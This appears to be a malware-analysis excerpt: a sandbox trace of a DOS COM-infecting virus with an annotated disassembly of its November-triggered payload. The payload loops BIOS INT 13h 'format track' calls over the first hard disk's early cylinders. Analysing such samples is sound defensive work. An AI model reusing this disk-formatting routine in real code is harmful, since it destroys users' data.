2018-12-25T12:54:10.240336833Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.242710504Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.25487129Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.261796953Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.267857832Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.269198269Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.27622851Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.285454872Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.287599462Z 26 PC: 12af9 | Set disk transfer address
2018-12-25T12:54:10.288538116Z 59 PC: 12b03 | Change current directory
2018-12-25T12:54:10.290023847Z 42 PC: 12b07 | Get date 0x12b07: cmp dh, 0xb    ; INT 21h/AH=2Ah returns DH = month: is it month 11 (November)?
; Analyst notes (16-bit real-mode DOS code, Intel operand order). This window is the
; sample's date-triggered branch, reached after the file-search loop logged above.
; The window is a fixed-length disassembly excerpt, not a whole routine.
0x12b0a: jne 0x12b2b                    ; any other month: skip straight to the hand-off at 0x12b2b
0x12b0c: mov ch, 0                      ; CH = 0: start at cylinder 0 (CH is the INT 13h cylinder low byte)
; Loop body: one BIOS disk request per cylinder, re-entered at 0x12b0e so CH is kept.
0x12b0e: mov ax, 0x50d                  ; AH = 05h (INT 13h "format track"); AL = 0Dh - its meaning varies by BIOS/drive type
0x12b11: mov cl, 1                      ; CL = 1; reloaded every pass because loopne below decrements CX
0x12b13: mov dx, 0x80                   ; DH = 0 (head 0), DL = 80h (first fixed disk)
0x12b16: int 0x13                       ; BIOS disk service; destructive on real hardware. ES:BX is not set in this window,
                                        ; and the returned status (CF/AH) is never checked
0x12b18: inc ch                         ; next cylinder
0x12b1a: cmp ch, 0xd                    ; ZF = 1 once CH reaches 13
0x12b1d: loopne 0x12b0e                 ; CX-- then repeat while CX != 0 and ZF = 0 -> requests for cylinders 0..12
0x12b1f: call 0x12b64                   ; target lies outside this window; purpose not shown here
0x12b22: mov dx, 0x2e0
0x12b25: add dx, si                     ; DX = SI + 2E0h; SI looks like the code's relocation base (same pattern as the
                                        ; other `add dx, si` data references in this trace) - TODO confirm
0x12b27: mov ah, 9                      ; INT 21h/AH=09h: print the '$'-terminated string at DS:DX
0x12b29: int 0x21
; Common exit for both paths: near return to offset 100h, the load offset of a COM image.
0x12b2b: mov bx, 0x100
0x12b2e: push bx
0x12b2f: ret                            ; pops 0100h into IP; presumably hands control to the infected host program
; NOTE(review): the next logged event is the host's "Display string" at PC 12aa2, with no
; AH=09h call returning to 0x12b2b, so this run appears to have skipped the November
; branch. The trace therefore does not show the payload executing; whether this sandbox
; logs INT 13h at all is not visible here.
0x12b30: cmp byte ptr [si + 0x2d7], 1   ; not reachable by fall-through (follows the ret); tests a flag byte at SI+2D7h
0x12b35: je 0x12aec                     ; backward jump, just past the find first/next call site (PC 12ae7); role of the flag not visible here
2018-12-25T12:54:10.291944482Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')